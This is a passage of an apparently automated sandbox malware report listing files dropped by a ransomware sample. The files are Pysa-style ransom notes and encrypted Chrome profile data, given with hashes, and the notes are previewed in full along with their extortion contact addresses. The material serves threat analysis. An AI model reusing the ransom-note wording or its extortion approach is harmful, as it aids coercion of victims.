                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.918201227691724
                  Encrypted:false
                  SSDEEP:384:5QjqVeo+AvrfjRKuhQ5dnuGIDXf+hUY8hsNu3LG+KtNOiyRQ14Xt1rI:5QjPo+Av7jQYQ5U+hUx3LULWG4d10
                  MD5:5258F21EEF2377C241FD4846C5EA7675
                  SHA1:F493332D63AEB188CEC03876B5E7013BA9AE1AAB
                  SHA-256:167BD42E01C8566B9AE01434D624874393095F7B509ACEB5C16E5D1299687D8D
                  SHA-512:8255FE04581F85BC02E05B2FD1E2516982AE69A2274DE792ACAAA4FDCB6A9B38A288B5F22C585E2982356CB6C51A6AEF93F1280ACF94F0DF82FF35A8D91C582E
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.039803852266376
                  Encrypted:false
                  SSDEEP:48:84wwGB4VFhjjIiJUvM6LOzviKeBcsxy+aQu0XJ9DvWDxuwjZ7MyhdJH+srF8Oo10:84uB4VFhIOajOTfsxRJ9DvUB1My1+yFD
                  MD5:73373D7A2EE4400B9E5D0819E3CA5107
                  SHA1:412CB742815B21FB4963E9B74FA050A5200D29C4
                  SHA-256:C1D29CF38AA39246121E866259ABBDDB1CDE2415A2F4D123C4F699607DD7B7E6
                  SHA-512:5F7A1A7E8FB54789E1DF2A96C017F079979A94C493C4A28661A711EFBE5E335A3DDFBBA3911D5BD57632F91E133ADFBBD4FBCB845FC7FFDA529B694C92757E83
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994847270512666
                  Encrypted:true
                  SSDEEP:1536:8VCxcwxSTMd5k2c5JTS/4y2XT3xhygHbpAlKeHP0Q63puWlk9y0I5d+N22:RNdPc7W/pcGQUKy1MuWxP+z
                  MD5:C85383BFFC62203059C2E80442DD3026
                  SHA1:8EA8C715E537044E5754C7ECA76DC3CDD19DB8CC
                  SHA-256:6566714B919A6316A88E3C25A833BB0C19906F9B54761889BC4CC75B15CE772F
                  SHA-512:CD3E159FDDBBEF9EB688377D03F30A8D8036D199F79FD00FC18F202F395A8835A4218F95C001C65DBB00D84121C0F62039DAF62DE45427B97F4870180F399389
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):74752
                  Entropy (8bit):7.990984270922171
                  Encrypted:true
                  SSDEEP:1536:FVajUSYGb8BUYlEzTVlOJVpAd5YqiPEUARpQjTQZdI8n6XJcqxdDs5:FVaRYGb8OYlEzcpNnnARpQj0LRn6XSqU
                  MD5:A34DFF854202C0C4CC42CE76004DA484
                  SHA1:FA066EB929BFD1D7F439B07972C3780896F209F5
                  SHA-256:8FF357BA0FBE7DAC78A69DE88E0D47B7B33301ED33903FDC8FF126AF982C841F
                  SHA-512:D914B661B9A352C4170E700F15189D39E9B32AA1FC490D9DCB166D03788BDD415A1F6698017BF046A1BE94F8B0EE5B21852AE67C4AB6F798DD49F9ECAB1918E3
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17408
                  Entropy (8bit):7.884246250663821
                  Encrypted:false
                  SSDEEP:384:q/52Z3QikB3zh2B5xa8dNmtN52o8NmeX/pPygr:7rkdzgoNk9gY9ygr
                  MD5:EA1470737CE9A3F8834E15BEA235C22F
                  SHA1:D492ED318FF20F4A12B4BD1A448916E2E8F9ED52
                  SHA-256:519E38204B419381C5207A9C88229509EB12F6D71C55C1AB0AA4459FBB99ED2C
                  SHA-512:F02A4767D39A788433E15859F47240FBD035954C282461A909B6BBB120FBF41FB3239E9957972A866177E48A6A62B81B96A5968B658338E8EBF21B423941DD50
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17408
                  Entropy (8bit):7.885908149930665
                  Encrypted:false
                  SSDEEP:384:XDsIIdWd+YRkF+CRKtM9yq1ZMG4euMyKlSADR92qdczHfU9LUleJ:XDsIdhGFhRaUnMG4euylJR92zILU8
                  MD5:C8C6EBD70B0DBDE963FED7E2D592102B
                  SHA1:4F8E124B0C752AE48CA769658BEA09B7CD8D90CB
                  SHA-256:4E160229692CA04F32211E112D96F3A0DCE52DFAB40CD3951A5002FDDCE8EAB4
                  SHA-512:755AEB9D1CB82354965DAB13285C4804DB9031E3DF882A1E5A880C915A565797103B42C3D3811FEE93BA65E737DBB33B715288D83E0B0532A1B51A321EB4EE0C
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Floc\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
